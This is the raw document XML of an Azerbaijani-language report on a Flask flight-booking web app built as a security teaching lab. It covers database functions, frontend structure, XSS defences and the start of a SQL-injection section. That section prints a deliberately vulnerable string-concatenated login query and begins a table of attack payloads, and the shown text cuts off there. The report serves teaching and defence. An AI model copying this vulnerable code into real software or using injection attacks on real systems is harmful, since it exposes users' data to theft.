        <w:t xml:space="preserve">4.5. Verilənlər Bazası Funksiyaları Xülasəsi</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3546"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Funksiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Məqsəd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Əməliyyatı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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user_get_by_email(email)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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E-poçtla axtarış</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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SELECT ... WHERE lower(email) = %s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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user_get_by_id(id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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ID ilə axtarış</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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SELECT id, email, full_name, about_me (password_hash yox!)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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user_insert(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Yeni istifadəçi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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INSERT INTO users ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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user_update_about_me(id, text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Profil yeniləmə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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UPDATE users SET about_me = %s WHERE id = %s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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user_bookings_for_user(id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Sifarişlər (JOIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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SELECT ... JOIN flights WHERE user_id = %s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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admin_reports_data()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Admin hesabat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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SELECT ... JOIN users JOIN flights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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_user_lookup_concat(email)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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  LAB: Zəif SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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Sətir birləşdirməsi — injection mümkün!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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_user_insert_concat(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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  LAB: Zəif INSERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3546"/>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Sətir birləşdirməsi — injection mümkün!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1. Ümumi Prinsip</w:t>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Layihənin frontend hissəsi Vanilla JS ilə yazılıb — heç bir framework (React, Vue, Angular) istifadə edilmir. HTML fayllar server tərəfindən render edilmir; brauzer HTML-i yükləyir, JS-i işlədib fetch() ilə Flask API-ni çağırır, cavabı DOM-a yazır. Bu yanaşma SPA (Single Page Application) deyil — hər səhifə ayrı HTML fayldır, amma dinamik məlumat üçün AJAX istifadə edir.</w:t>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Diqqəti backend-də (SQL injection, sessiya, API) saxlamaq üçün Vanilla JS seçildi: HTTP, DOM, fetch() kimi əsasları öyrənmək, framework-ə keçmədən əvvəl zəruri idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2. Fayl Strukturu</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5646"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fayl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ölçü</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Məqsəd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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lang.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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36 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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AZ/RU/EN çeviri, dəyişiklik hadisəsi (CustomEvent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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style.css</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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28 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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Dark theme, glassmorphism, animasiyalar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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panel.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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14 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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İstifadəçi paneli — profil, sifarişlər, yükləmə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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auth.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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11 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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Giriş/qeydiyyat, SQLi simulyasiya paneli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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aviakassa.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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10 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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Reys axtarışı — kaskad seçim, validasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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admin.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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6 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5646"/>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Admin hesabat, IDOR test bölməsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3. XSS Müdafiəsi — Frontend</w:t>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Frontend-də XSS-ə (Cross-Site Scripting) qarşı üç müxtəlif müdafiə üsulu tətbiq edilib:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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3846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Üsul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nümunə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Qorunma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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textContent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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pre.textContent = sqlFragment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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Mətn kimi render — heç vaxt HTML kimi yox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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esc() funksiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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esc(b.id) → innerHTML-ə əvvəl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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&lt;, &gt;, &amp;, " simvollarını entity-ə çevirir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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guvenliMetn()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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guvenliMetn(hs) → innerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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aviakassa.js-də eyni prinsip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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Pozitiv nümunə: auth.js-də SQLi sızıntı göstəricisini pre.textContent ilə render etmək hücumçunun yazdığı mətni HTML kimi icra etmir. Potensial problem isə panel.js-də about_me sahəsinin innerHTML ilə render edilməsidir — server sanitasiya etmirirsə, DB-dəki &lt;script&gt; işlənər (Bölmə 6.6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4. Çoxdillilik — lang.js</w:t>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lang.js layihənin ən böyük faylıdır (36 KB) və Azərbaycan (az), Rus (ru), İngilis (en) dilini dəstəkləyir. Dil seçimi localStorage-da saxlanılır. Dəyişiklik zamanı window.dispatchEvent(new CustomEvent("aviakassa:langchange")) hadisəsi yayılır; hər komponent bu hadisəni dinləyib özünü yeniləyir. HTML elementlərindəki data-i18n atributu açar kimi istifadə olunur:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!-- login.html --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;h2 data-i18n="login_heading"&gt;Giriş&lt;/h2&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// lang.js — applyPage() prinsipi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">document.querySelectorAll("[data-i18n]").forEach(el =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    el.textContent = AviakassaLang.t(el.getAttribute("data-i18n"));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Təhlükəsizlik Boşluqları — Lab Ssenarilər</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="24"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Əhəmiyyətli qeyd: Bu bölmədəki bütün zəifliklər bilərəkdən tədris məqsədi üçün daxil edilib. WEBSEC_LAB=0 ilə bütün lab yolları söndürülür — yalnız təhlükəsiz kod işləyir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1. SQL Injection — OWASP A03:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zəifliyin Təsviri</w:t>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SQL Injection — istifadəçi girişinin SQL sorğusuna birbaşa daxil edilməsindən yaranan zəiflikdir. Hücumçu öz SQL kodunu sorğuya "iynə" edərək bazadan istədiyi məlumatı alır, dəyişdirir, hətta silir. Bu, OWASP Top 10-un hər buraxılışında yer alan ən köklü problem sinfidir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zəif Kod (Lab)</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — _user_lookup_concat()  ⚠️ YALNIZ DEV_INSECURE_SQL=1 OLDUQDA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">def _user_lookup_concat(email: str):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    sql = (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "SELECT id, email, password_hash, full_name FROM users WHERE email = '" </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        + email   # ← Birbaşa string birləşdirməsi — injection vektoru!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        + "'"</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cur.execute(sql)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hücum Ssenarileri</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446"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Addım</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nəticə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Sintaksis sınağı</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3446"/>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PostgreSQL SyntaxError — zəifliyə həssaslığın işarəsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Bypass</w:t>
            </w:r>
